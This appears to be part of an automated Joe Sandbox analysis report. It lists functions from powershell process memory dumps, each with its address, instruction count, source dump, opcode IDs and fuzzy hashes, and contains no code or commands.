                                                              Function 00D0AF88 Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 449c5d17938db6936d6b7e43a98076451be189e0a613fe63a02fe687ed512ace
                                                              • Instruction ID: 3c354d8c8702aadf647296c2f7f5566a156a8b562da42a427aa5359f7a7c0c30
                                                              • Opcode Fuzzy Hash: 449c5d17938db6936d6b7e43a98076451be189e0a613fe63a02fe687ed512ace
                                                              • Instruction Fuzzy Hash: 8BE0D82231879307DB15512D78107D6AF62CBC7361F1940B6F448CB2C6EE92480643A2
                                                              Function 00D09168 Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3dce32160c36e92774937e5677dcb95f408fc9c3c4cc4cc71938bf071b4fcf1d
                                                              • Instruction ID: 15d70ab874f92b8617d6bd5fb07d8fe6228ca56302f017fa0904e77339712dea
                                                              • Opcode Fuzzy Hash: 3dce32160c36e92774937e5677dcb95f408fc9c3c4cc4cc71938bf071b4fcf1d
                                                              • Instruction Fuzzy Hash: 76F0E570A003049BD7649BB9D89D79ABBE9FB45320F004469E65ED7380DF3969808BD0
                                                              Function 00D09549 Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1f09678bc2fe0f4d25e1da68b49e640dc0f264aa5f0af595933907f4bb028338
                                                              • Instruction ID: 4acf1e1252d29674f3e4fd602a4ef9d347683b730ad693324e9cb4280544d08e
                                                              • Opcode Fuzzy Hash: 1f09678bc2fe0f4d25e1da68b49e640dc0f264aa5f0af595933907f4bb028338
                                                              • Instruction Fuzzy Hash: C4E0C2A270502217D65470BA1C103B786CBCBC2391B1D0035EA4CC32C3ED40CC0253F9
                                                              Function 00D08978 Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e313aba6640d873ed9a86f00412d99a729145ca9b448ad0b9a5ba893866d3fb
                                                              • Instruction ID: 4918df4fbd8790fc1699f48d7d757b6a5b4168a5c45fa290abc4e7e7356c135c
                                                              • Opcode Fuzzy Hash: 8e313aba6640d873ed9a86f00412d99a729145ca9b448ad0b9a5ba893866d3fb
                                                              • Instruction Fuzzy Hash: 9EE0DF3130421057CB082774A80D3AE7B96EBC4725F01002AE60A83381CF3C0D0183E9
                                                              Function 00D09550 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 479a9feb5a0ba357ecdc82eb9aad05bed08153b7e357e73ce55736506afd43e6
                                                              • Instruction ID: 4dd9b6c4a8549ed222a8db64c1ec3d60e30874a71188bb8c23ee6dfc03ec5dcb
                                                              • Opcode Fuzzy Hash: 479a9feb5a0ba357ecdc82eb9aad05bed08153b7e357e73ce55736506afd43e6
                                                              • Instruction Fuzzy Hash: 5FD05EA27011262B855870BA28117BBD2CFCAC56A071D0036FA4DC32C3EC40CC0263F9
                                                              Function 00D0DCE8 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                              • Instruction ID: 010feab588ded035140250be7063ef1e0fed4d12a4994a1f63e2f2b99184a023
                                                              • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                              • Instruction Fuzzy Hash: 0EE08631B1011497CB089999D4145EDF7AADBCC320F14807BE94AA7380DA32991586F1
                                                              Function 00D0DC98 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d4b65377735371d7789aab567e06add10455d750d6ce8a0a18a0f30f5e618e2
                                                              • Instruction ID: 8cc95b01eaf50836b8554bd1fbecb30942fd23e23342b115e145ea5e21aa3a3d
                                                              • Opcode Fuzzy Hash: 5d4b65377735371d7789aab567e06add10455d750d6ce8a0a18a0f30f5e618e2
                                                              • Instruction Fuzzy Hash: BEE08C31700614478615A66EA800A5FBBEFDEC9771304402AE10A87380DE68ED0687E5
                                                              Function 00D08739 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 819ce0a54c0f0512db0aa07ddf767873a52d91ef8b6feeded27831c784861bd8
                                                              • Instruction ID: c4aec8a49c62d3216e2fb0cdb73eb7a51884c31341cc5e4c529832d30956db45
                                                              • Opcode Fuzzy Hash: 819ce0a54c0f0512db0aa07ddf767873a52d91ef8b6feeded27831c784861bd8
                                                              • Instruction Fuzzy Hash: B8E04635C1410A8BCB08AFB4E80F9EDBF34FB00321F500269EA87821D0DB741A5ACEC1
                                                              Function 00D08800 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 43b7defbe9b896365bc598a77c3694fe19de550e7f06601177d3fd8c7693e75f
                                                              • Instruction ID: 83e86dba2d61e0c880c92ee891375dd9e82c8927237b045680582b72ca58db71
                                                              • Opcode Fuzzy Hash: 43b7defbe9b896365bc598a77c3694fe19de550e7f06601177d3fd8c7693e75f
                                                              • Instruction Fuzzy Hash: EDE01A3590820A8BCB54EBA8E44B9A9BBB4AB49310F104265E95993281EB309891DBC5
                                                              Function 00D0F460 Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ef9c1da9a1153310491279d00cd1bba3fadd8819648b25b332d38fd13aaf0354
                                                              • Instruction ID: ebaa932d59ad175a58a0a38d4f49a37b70e44b21bb2badb479aef3dc968d8968
                                                              • Opcode Fuzzy Hash: ef9c1da9a1153310491279d00cd1bba3fadd8819648b25b332d38fd13aaf0354
                                                              • Instruction Fuzzy Hash: 65E01A71D041869FC790DFB8D4411AEFFF0EB49244B648AEAD849DB212E6318602CB81
                                                              Function 00D0F470 Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                              • Instruction ID: 4d66876d73c087f916c78b596cef1197274ad2c61539c3cbbfa00230f332b2e6
                                                              • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                              • Instruction Fuzzy Hash: BBD067B0D042099FC790EFADC94166EFBF4EB48204F6485BA891DE7341E7329A12CBD1
                                                              Function 00D08748 Relevance: .0, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d926880a65a4be5e21bf0273e370c178b57492017c168fe22718976850fe5a7
                                                              • Instruction ID: 0032fc38c28945f28a87c83b3375756882a50d36eec927efc3ac4c6bce31be0b
                                                              • Opcode Fuzzy Hash: 1d926880a65a4be5e21bf0273e370c178b57492017c168fe22718976850fe5a7
                                                              • Instruction Fuzzy Hash: D8D06731C041099BCB08ABB4E85F5BDBB74FA14311F514169DA4752190EE355A5ACAC5
                                                              Function 00D08810 Relevance: .0, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c8761a72de484e6a8515cde464e2066bb9c57ea060cc1359d15ef43f9862688f
                                                              • Instruction ID: 94b69a23452fb1dae305670360cf36243b06c2de9ff486bb9f57c6ba31856215
                                                              • Opcode Fuzzy Hash: c8761a72de484e6a8515cde464e2066bb9c57ea060cc1359d15ef43f9862688f
                                                              • Instruction Fuzzy Hash: 78D01734A0820A8BCB58EFA4E84A96EBBB8AB49301F004169ED4993380EA305C01DFC1
                                                              Function 00D07932 Relevance: .0, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2999a2dd81af19581d533b9750d2c8f5d51168b9bdd4a92a3962ea91bdba4f62
                                                              • Instruction ID: 20a430bbfb726783c4a072099dbdb5219dc8299c8b6d237ad2af12c754a24bf9
                                                              • Opcode Fuzzy Hash: 2999a2dd81af19581d533b9750d2c8f5d51168b9bdd4a92a3962ea91bdba4f62
                                                              • Instruction Fuzzy Hash: D7D0C9310093848FC70A5B31A8264943F28EB4225474604EAE44A8F2B39A69AE45CBA1
                                                              Function 00D07EA0 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 62c9e1e623f59b5b1e48b0e48c453b00ad3afb926c2ec715f80069607dbd4c6b
                                                              • Instruction ID: 853369ecd1c1ab1e7554f696d1ee108d7404cea809ecdb1a902ccb05ccfe008f
                                                              • Opcode Fuzzy Hash: 62c9e1e623f59b5b1e48b0e48c453b00ad3afb926c2ec715f80069607dbd4c6b
                                                              • Instruction Fuzzy Hash: C1C04C1750A3901FEE0252316DE51966FB1554362570647C3D841C6062D918CD068291
                                                              Function 00D07940 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc67e3764b088617d54d1831464c6018f9709058f53fb9e2f261e5789dfc94d5
                                                              • Instruction ID: 3b229a1eb2dd66e18b586c606593db3dc28a9d497932e6b5a94441e5d3ee4f78
                                                              • Opcode Fuzzy Hash: fc67e3764b088617d54d1831464c6018f9709058f53fb9e2f261e5789dfc94d5
                                                              • Instruction Fuzzy Hash: 9BB092310447088FC2486F76A805818732DBB8021578004E8E80E0B2A68E3AE884CE44

                                                              Non-executed Functions

                                                              Function 06C01BE0 Relevance: 20.4, Strings: 16, Instructions: 415COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2074883631.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$84#l$84#l$pij$tPjq$tPjq$J&l$J&l$J&l$J&l$J&l$r%l$r%l
                                                              • API String ID: 0-2481791253
                                                              • Opcode ID: 7763052693aea1149cc8c335cedf9dbbd4d837b99be25a8f439111870a127921
                                                              • Instruction ID: 377f4fc6fa9b6199e1a114c6bf4c31714f0a8a023ed8bde576bb3607d937e7ef
                                                              • Opcode Fuzzy Hash: 7763052693aea1149cc8c335cedf9dbbd4d837b99be25a8f439111870a127921
                                                              • Instruction Fuzzy Hash: 66D15531F043548FEB619BA9841466AFBEAAFC1310F2884BFC855CB691DB35CE45C7A1
                                                              Function 06C00FB8 Relevance: 12.7, Strings: 10, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2074883631.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: foq$84#l$`Qjq$`Qjq$tPjq$$jq$$jq$$jq$$jq$$jq
                                                              • API String ID: 0-2352571334
                                                              • Opcode ID: af77fb1472e88c41760cd81ba4c9e19fb7266a44c3bdd0bd9c251bc24c7aa10b
                                                              • Instruction ID: 4fc77f2b8035a253902a1b64e30896b8bf90cd1cc220f01457eae2b584e97f04
                                                              • Opcode Fuzzy Hash: af77fb1472e88c41760cd81ba4c9e19fb7266a44c3bdd0bd9c251bc24c7aa10b
                                                              • Instruction Fuzzy Hash: 91619D30A08249DFFBA8CF85C544BAAF7B6BB45355F0C8059E8019BAD1C735DE90CBA1
                                                              Function 06C03928 Relevance: 10.3, Strings: 8, Instructions: 331COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2074883631.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq
                                                              • API String ID: 0-2400798967
                                                              • Opcode ID: 57145d250294fb30288d0689efc7ec6858720ca5c52b356fad3657ba233a034c
                                                              • Instruction ID: 30cd36e86e45ad0aa45ac85e71ac793b0fbae5c6aae56cbd639c28f9886ffa84
                                                              • Opcode Fuzzy Hash: 57145d250294fb30288d0689efc7ec6858720ca5c52b356fad3657ba233a034c
                                                              • Instruction Fuzzy Hash: 5FA15B31B042969FEB649B698810777BBE6EFC5610F24806ED849CB3D1CA35CE45C7A1
                                                              Function 06C00488 Relevance: 9.2, Strings: 7, Instructions: 497COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2074883631.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: foq$4'jq$4'jq$4'jq$4'jq$r%l$r%l
                                                              • API String ID: 0-3152926001
                                                              • Opcode ID: ad06f4940874c8836bf3d82cdd707a7a650c05c9e0299daf3d7eb4171df2c953
                                                              • Instruction ID: 304cda18b0f6d259c87bf14c859ced03e5ea3602fa45f910988903310d994e22
                                                              • Opcode Fuzzy Hash: ad06f4940874c8836bf3d82cdd707a7a650c05c9e0299daf3d7eb4171df2c953
                                                              • Instruction Fuzzy Hash: 3EF16631B042548FEB559B78941076BBBA2AFC2310F2584BFD845CB2D2DA35CE96C7A1
                                                              Function 00D07210 Relevance: 6.5, Strings: 5, Instructions: 243COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tM%l$`kq$`kq$`kq$`kq
                                                              • API String ID: 0-34202162
                                                              • Opcode ID: d64936634dceddf56d1393edc1969cf9e8bcc798ed9a72c4bbfd5f57de6ce09e
                                                              • Instruction ID: 8b829600cf8f710488b9a6ba12ff44960f5ba8c4c59907a23b787b5425a9a246
                                                              • Opcode Fuzzy Hash: d64936634dceddf56d1393edc1969cf9e8bcc798ed9a72c4bbfd5f57de6ce09e
                                                              • Instruction Fuzzy Hash: 7EB1B774E002099FDB54DFA9D980A9EFBF6FF88300F148629E419AB355DB34A945CF90
                                                              Function 00D07A21 Relevance: 6.5, Strings: 5, Instructions: 243COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tM%l$`kq$`kq$`kq$`kq
                                                              • API String ID: 0-34202162
                                                              • Opcode ID: 252f06424e42757b9f5ac0ebbf6a45c960dde31a3aa6887e068a06dc01c9189f
                                                              • Instruction ID: 3f9e987563cdd919fc0d88310181adce8efc8ea015cff4927a40de569dc33eb3
                                                              • Opcode Fuzzy Hash: 252f06424e42757b9f5ac0ebbf6a45c960dde31a3aa6887e068a06dc01c9189f
                                                              • Instruction Fuzzy Hash: 0AB1A874E002099FDB54DFA9D980A9EFBF6FF88300F148629E419AB355DB34A945CF90
                                                              Function 00D07A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tM%l$`kq$`kq$`kq$`kq
                                                              • API String ID: 0-34202162
                                                              • Opcode ID: 0d46f7b0987992352bbad2ad31ff2b085273e34e1e3a5839d176a573f0b247fb
                                                              • Instruction ID: 7b320075bd44a3891403d5479f77ecee12648729aa29275ba19cd20e23f0831b
                                                              • Opcode Fuzzy Hash: 0d46f7b0987992352bbad2ad31ff2b085273e34e1e3a5839d176a573f0b247fb
                                                              • Instruction Fuzzy Hash: 82B19774E002099FDB54DFA9D980A9EFBF6FF88300F148629E419AB355DB34A945CF90
                                                              Function 06C03678 Relevance: 6.4, Strings: 5, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2074883631.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                              • API String ID: 0-103809679
                                                              • Opcode ID: 6188bec399c0960cd2e61d164e58ef693e9a3099bbc7294a9adf099690071666
                                                              • Instruction ID: 92a3704b8d68e55bd8a1684eb86ba9443d9a11eacc6ab92c6333825a7e327741
                                                              • Opcode Fuzzy Hash: 6188bec399c0960cd2e61d164e58ef693e9a3099bbc7294a9adf099690071666
                                                              • Instruction Fuzzy Hash: E1514735B0438ADFEB654A6D8900367FBB6EFC1610F2480AFD809CB2D1DA35CA55C7A1
                                                              Function 06C02107 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2074883631.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $jq$$jq$J&l$J&l$J&l
                                                              • API String ID: 0-4122950836
                                                              • Opcode ID: 7bda25551c6bf540949acb2cb054ff1b9f1fcec678b34da14708b91b04587298
                                                              • Instruction ID: b7f3e538d1af64f7e99a0cb2a11aa0849857a5fd1b4d470ec538e20c2b75a44c
                                                              • Opcode Fuzzy Hash: 7bda25551c6bf540949acb2cb054ff1b9f1fcec678b34da14708b91b04587298
                                                              • Instruction Fuzzy Hash: 5E212632A4D3849FE31646684C241667FB69F93210B2945DBC9C1DF2E7C929CE4AC3A2
                                                              Function 06C05798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2074883631.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $jq$$jq$$jq$$jq
                                                              • API String ID: 0-2428501249
                                                              • Opcode ID: cc85bff4dbf7b48b95f286609a480656be2b41246386180205ae0225f179da7d
                                                              • Instruction ID: a87005f214dd6ac8f3521d5ab1a1e3acb44ab982c0ebccc51e05c27d1363346a
                                                              • Opcode Fuzzy Hash: cc85bff4dbf7b48b95f286609a480656be2b41246386180205ae0225f179da7d
                                                              • Instruction Fuzzy Hash: 4C213731B642049FFBA4592E8A00727B7DB9BC0711FA4853FAD05DB2C5DD75C940CBA1
                                                              Function 06C022E8 Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2074883631.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: pij$pij$J&l$J&l
                                                              • API String ID: 0-1627512543
                                                              • Opcode ID: 10625ed032a161399765937e1d757502e6e324cc2b740e50b63a2091ae7935d2
                                                              • Instruction ID: fbabbed806dc49b8618dc3812434bc6aadc8dd18c686c3499c58fd1b2be90760
                                                              • Opcode Fuzzy Hash: 10625ed032a161399765937e1d757502e6e324cc2b740e50b63a2091ae7935d2
                                                              • Instruction Fuzzy Hash: 0B21B431D04314EFFFA1CF55C1496A6B7F8AB09311F5880AAD8589B291D33DDB85CBA1
                                                              Function 06C00308 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2074883631.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$$jq$$jq
                                                              • API String ID: 0-1496060811
                                                              • Opcode ID: c7daeaeb412906e64b626d29b7ac24c11808446e365deaa67f9e0a44768bd39c
                                                              • Instruction ID: f58648f950d28950177f5f0e625c6eaa6aeef21bbeb5966f9b7397b19bf68eca
                                                              • Opcode Fuzzy Hash: c7daeaeb412906e64b626d29b7ac24c11808446e365deaa67f9e0a44768bd39c
                                                              • Instruction Fuzzy Hash: E601D41174D3D54FD72716384430726AFB65F83560B2A40DBC481DF2D7CD188E0983A7

                                                              Executed Functions

                                                              Function 04B4B490 Relevance: .3, Instructions: 258COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 794e3b4ee9964c9058514d919b4a0db22ad2a936e25f6c07871b8aa2f89692f8
                                                              • Instruction ID: fa3f167de3c5146ca731e1e426fdcc3682741652d2e983ca3857b04ce0df6a26
                                                              • Opcode Fuzzy Hash: 794e3b4ee9964c9058514d919b4a0db22ad2a936e25f6c07871b8aa2f89692f8
                                                              • Instruction Fuzzy Hash: 23919175B007149BDB19DFB48510AAE77F2EFC8600B00892ED556AF394DF35AE068BC5
                                                              Function 04B4B4A0 Relevance: .3, Instructions: 252COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eed213fff2cad2cf1d32683c5334479ec5d74318adcfc4081ff3b80cf4ab7028
                                                              • Instruction ID: 520fbe5514898cbb36a0ca9960338436f49247f32e5fdae9fb69e50be6776dd0
                                                              • Opcode Fuzzy Hash: eed213fff2cad2cf1d32683c5334479ec5d74318adcfc4081ff3b80cf4ab7028
                                                              • Instruction Fuzzy Hash: 33918175B007149BDB19DFB48610AAE77F2EFC8700B00892DD616AB398DF35AE058BC5
                                                              Function 079C2308 Relevance: 20.7, Strings: 16, Instructions: 655COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2115212357.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_79c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$pij$pij$pij$pij$pij$|,j$J&l$J&l$J&l$J&l$J&l$J&l$r%l$r%l
                                                              • API String ID: 0-1114343213
                                                              • Opcode ID: 28db91118cf9fd002ffa6e626ea4c3bd9fca3d043863e5abfd10b27bb8e7ecf7
                                                              • Instruction ID: 749838d0e36361058f3f9b321101f0d4be8dbb14d72e7511791a5f0e7a3be2bf
                                                              • Opcode Fuzzy Hash: 28db91118cf9fd002ffa6e626ea4c3bd9fca3d043863e5abfd10b27bb8e7ecf7
